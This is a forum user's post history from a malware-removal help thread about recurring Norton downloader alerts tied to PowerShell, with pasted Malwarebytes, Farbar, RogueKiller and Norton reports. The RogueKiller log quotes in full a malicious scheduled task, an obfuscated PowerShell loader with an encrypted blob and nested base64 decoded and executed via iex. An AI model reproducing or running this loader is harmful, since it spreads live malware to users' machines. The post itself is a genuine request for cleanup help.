Jump to content

tammathah

Members
  • Posts

    13
  • Joined

  • Last visited

Reputation

0 Neutral
  1. i haven't gotten the pop up anymore so yes all is well. Thank you so much for everything youve done for me
  2. this is the answer i got from Norton itself Submission Date 2019-04-17 19:51:34 Tracking # 43173871 Submitter tamara kinders Customer Notes roguekiller sees it as a serious threat but i think its a false positive. tamara kinders, We have processed your submission (Tracking #43173871) and your submission is now closed. The following is a report of our findings for the files in your submission: Submission Summary ________________________________ Files Submitted # Filename MD5 Determination Signature Protection Name RR Seq# 1 NortonSecurity.exe 229cb9487745972b70b539644ec99d67 Clean N/A N/A Developer Notes: 1. NortonSecurity.exe is a clean file. ________________________________ Assessment ________________________________ File 1: NortonSecurity.exe MD5: 229cb9487745972b70b539644ec99d67 SHA256: 04e0645f72842f9659e805b54aed6744d3425e8270af1d6bb188c434ffaebd94 Determination: Clean Submission Detail: This file is clean. ________________________________
  3. since last night, i haven't gotten a pop up yet so i think its fixed. Also Roguekiller only found something Norton related so i didnt touch that because i dont want my anti virus to be messed up. Fixlog.txt roguekiller2.txt
  4. Malwarebytes www.malwarebytes.com -Logboekdetails- Scandatum: 16-04-19 Scantijd: 00:35 Logbestand: bf786ecc-5fce-11e9-9d2d-9cb654f226f2.json -Software-informatie- Versie: 3.7.1.2839 Versie componenten: 1.0.563 Update pakketversie: 1.0.10180 Licentie: Proef -Systeeminformatie- Besturingssysteem: Windows 10 (Build 17763.437) Processor: x64 Bestandssysteem: NTFS Gebruiker: System -Scansamenvatting- Scantype: Bedreigingsscan Scan geactiveerd door: Scheduler Resultaat: Voltooid Objecten gescand: 293092 Dreigingen herkend: 0 Dreigingen in quarantaine: 0 Verstreken tijd: 5 min, 38 sec -Scanopties- Geheugen: Ingeschakeld Opstarten: Ingeschakeld Bestandssysteem: Ingeschakeld Archieven: Ingeschakeld Rootkits: Uitgeschakeld Heuristiek: Ingeschakeld POP: Detectie POA: Detectie -Scandetails- Proces: 0 (Geen kwaadaardige items gedetecteerd) Module: 0 (Geen kwaadaardige items gedetecteerd) Registersleutel: 0 (Geen kwaadaardige items gedetecteerd) Registerwaarde: 0 (Geen kwaadaardige items gedetecteerd) Registerdata: 0 (Geen kwaadaardige items gedetecteerd) Gegevensstroom: 0 (Geen kwaadaardige items gedetecteerd) Map: 0 (Geen kwaadaardige items gedetecteerd) Bestand: 0 (Geen kwaadaardige items gedetecteerd) Fysieke sector: 0 (Geen kwaadaardige items gedetecteerd) WMI: 0 (Geen kwaadaardige items gedetecteerd) (end) ==== RogueKiller Anti-Malware V13.1.9.0 (x64) [Mar 27 2019] (Free) by Adlice Software mail : https://adlice.com/contact/ Website : https://adlice.com/download/roguekiller/ Operating System : Windows 10 (10.0.17763) 64 bits Started in : Normal mode User : Gebruiker [Administrator] Started from : C:\Program Files\RogueKiller\RogueKiller64.exe Signatures : 20190326_132530, Driver : Loaded Mode : Standard Scan, Scan -- Date : 2019/04/16 00:46:11 (Duration : 00:08:58) Switches : -refid 3 ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ [Suspicious.Path (Potentially Malicious)] \Microsoft\Windows\UNP\UNP -- powershell.exe [-c "$ddd = 'u322UqtjiCvsWr9X1FXLPaxerQGMTcoYnATvLsoo7HyWZJwG0BKES4l36HKcYqIRkGWtfK1Zl0KpMohwxVKlH5IZhGvtUqo9u0OgTItbtgyLSdB24RX8YNkz9Hn5bYhItm/6S94FiiCaH5AJtzbUMLM9yzLBTc1T31bNNa460yP+XKNG62bkGJNO3HOJP68ViiKNAZ1i/wnCKbEi6Q2aEp1B2AX7PbBU7Tq4DOFl+kmQEpdY6wHgEo0TnE3MFv54lmKwN4stpRCbErADmWn4Lsxy7VrcZ7xl4hKGGa8yjSrcApsA1VSaKcsY60HuEusHlRWdQdVfu3fvTbtmihCjWflpkROLSeEB7FvMAtUUjRO/PL5U8mCNZp1NvQ+fEpl1+E7SPcoTl3jQdOMYyFTBYo94lhfAWIYVnyrjH/V26BW7O4IVjAyRStZbpSPrZpwB4FjoaYEDiiKqF/oQxjeNBLoV7GSKafh2qneCBp8N2U3VLqJBjWboNZdQ/HG4VNdJsj7ZeNNS3keDRoJz9RW9OrAI/UCgD5YdoUD8cKtd8XHZU704pHPBFck3yQD9TboRhhSHHb85qG7lepR2nUPPQNwpnX/lfp1qrFTDMfh/rSaNFOB/k3alK4URnBi1PbYc/WCjOvYJjw6lU8YW8GHlFLcnnFenUeBpkQ6lMLQW4A7AK4URnBjCLt9CoTvdcMFK10nYX5VhpDebNqxMlHCyJrkG2gr4PcAz1hOHHcpLlWLgDvporwvxQ8ZE1h2XRqRprxH7KdsI+X79MspJ3GDkSuAO2V6YGJhP9inBbqko3XHNOK0ZghCZaqJdjXOiNp13wHDhCJsT5kvHK7sCjRGcFcAj7Rm2KK8TtSmXCpcevRHre9kV+32LBe5+sCyDB5R5616tEsYlmxWaMfhxi3O2N4xiy0eME4FZ2HWiVI1z3gSLZf174xjWSakynnXFVJoDmF67c+0J6mDIDv8NwA+eQacN8WDWVPxw2U3jb6071VTRcesd4BSVVJpNjBX8NM1c2GqKd5UO0COeCopi/me1PbYninr/V/EOm1amRYljkR6PWMAejXChEv157gLvSKgfix2ZCbFdxF7MYIsF7GffbYQCnXimQfsTmF6vFZwi+meVaOVgnFCEEZsBnEzVLqU9umLtBax613v0VddJuzbVNZkUw1KdSYFy5hL0fKlIoBWSANBJ0QrwYKtU7T2CBfVj+XXBFMVR3Rz6FI0dxiSNCOs6oGnofJ1qngSjWssxqEG0Pa9i+DKMZ/t791XaErst2XDFWMwC1VSaKf8N83r/SblI2UrKQNU/r0mwVPApyVvkbKUshEbVb/9FuEmTVIdNwBn6bMUj+UjIXtlDgkC+EYgq32eabuIGhXD+ZvUUmEi2d908nQHIR8ELzH+xX70ooy/+H9YpmgOZB+s02AnsYJwNo17leoAHnGPgAqctnQSNCMBU62aQYqc3i1jBPtI7gwGaWqhrwS6iIpR64XC4VMUJ9D7ZadELzB/VUtgl8RjzYO4avwfGRMlLgRn6ePgV5HGBCfl3qWfYQpck/RDrE5wCgR6PWK84xVzYaop3lQ7QLZAQlFq2KaVu4knNJaIlvF3aD7xamH+fBIBZwUvMdf9A+3boQbMzqB+LHZkJsUDuCOs6vA7uZelhiwGlMLQw3SbQXq8VnDLmYIB0ozeWKtlD1kSYT94x52bdfv4qny31N7lG2hLhK6Zkihm1StI1m2TtDfpX6hX6O48UkQebTMRX5B7pcYsU0DC3XIokmXnrU70znAKBHo9Yu2aWLqIo3XHNOK0ZghCZaqJdjXOiNp13wHDhCJsT5kvHK7sCjRGcFcAj7Rm0Ma0QpkrQQooa1V+7ZqUx83iWF8x/+We3A5xj/ADqFNVUjhGEA/ovwXWlRopmgiKZBZ8QwSP5ctMj/k+IZ/1t6UDaEKkyjz+/FZwijQOYaOIO+juiHdQdj0u2HJAIpA==';iex('$'+'d=''Wm5WdVkzUnBiMjRnWkdWaktGdGllWFJsVzExZEpHTmlMQ0JiYzNSeWFXNW5YU1J3WVhOektYc2tjR0lnUFNCYlUzbHpkR1Z0TGxSbGVIUXVSVzVqYjJScGJtZGRPanBWVkVZNExrZGxkRUo1ZEdWektDUndZWE56S1Rza2N5QTlJQ1J3WWxzd1hUc2thajB3TzJadmNpZ2thU0E5SURBN0lDUnBJQzFzZENBa1kySXVRMjkxYm5RN0lDUnBLeXNwZTJsbUtDUnFJQzFuWlNBa2NHSXVRMjkxYm5RcGV5UnFQVEI5SUNSeklEMGdLREl6SUMxaVlXNWtJQ1J6SUMxaWIzSWdNVFV5S1NBdFluaHZjaUFrY3pza1kySmJKR2xkSUQwZ0pHTmlXeVJwWFNBdFluaHZjaUFrY0dKYkpHcGRJQzFpZUc5eUlDUnpPeVJxS3l0OWNtVjBkWEp1SUNSallqdDlKRzlpYWlBOUlHZDNiV2tnZDJsdU16SmZaR2x6YTJSeWFYWmxJSHdnZDJobGNtVWdleVJmTGtSbGRtbGpaVWxFSUMxbGNTQW5YRnd1WEZCSVdWTkpRMEZNUkZKSlZrVXdKMzBnZkNCelpXeGxZM1FnVFc5a1pXd3NJRk5sY21saGJHNTFiV0psY2pza1pDQTlJR1JsWXlBb1cxTjVjM1JsYlM1RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna1pHUmtLU2tnS0NSdlltb3VUVzlrWld3Z0t5QW5JQ2NnS3lBa2IySnFMbE5sY21saGJHNTFiV0psY2lrN2FXVjRJQ2hwWlhnb0oxdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwSnlzblUzUnlhVzVuS0NSa0tTY3BLUT09'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')"] -> Found ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts file is too big ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ [PUP.Gen1 (Potentially Malicious)] (folder) Free Registry Cleaner -- C:\Users\Gebruiker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner -> Found [Adw.Xunlei (Malicious)] (folder) Thunder Network -- C:\ProgramData\Thunder Network -> Found [BitMiner.Gen0 (Malicious)] (folder) Windows -- C:\ProgramData\Windows -> Found ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
  5. the task isnt found in the addition log. === log registry: Farbar Recovery Scan Tool (x64) Versie: 17.03.2019 Gestart door Gebruiker (14-04-2019 16:19:11) Gestart vanaf C:\Users\Gebruiker\Desktop Boot Modus: Normal ================== Zoeken in register: "1.vbs" =========== ====== Einde van Zoeken ====== === file search button: Farbar Recovery Scan Tool (x64) Versie: 17.03.2019 Gestart door Gebruiker (14-04-2019 16:20:01) Gestart vanaf C:\Users\Gebruiker\Desktop Boot Modus: Normal ================== Bestanden Zoeken: "1.vbs" ============= ====== Einde van Zoeken ======
  6. i have waterfox, edge and internet explorer. I wasn't using a browser at all when it popped up during startup. i can even play a game, have no browsers open and then it pops up as well.
  7. no it didnt. I deleted Firefox and deleted the appdata. As soon as i rebooted the popup from Norton was there again. I haven't installed Firefox yet.
  8. it isnt fixed i just got the popup again saying auto protect had removed safety risk CL.Downloader!Gen11
  9. hello, Every 20 minutes i get a pop up by norton telling me it has blocked dl.downloader!gen11 and has it deleted. I can't find any other information besides that it is linked to powershell.exe When i run norton, it doesnt find a thing, when i run antimalwarebytes, it doesnt find a thing. It looks like my system is clean and yet i can't get rid of the pop up. Can anyone help me please? 20190412 malwarebytes rapport.txt Addition.txt FRST.txt
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.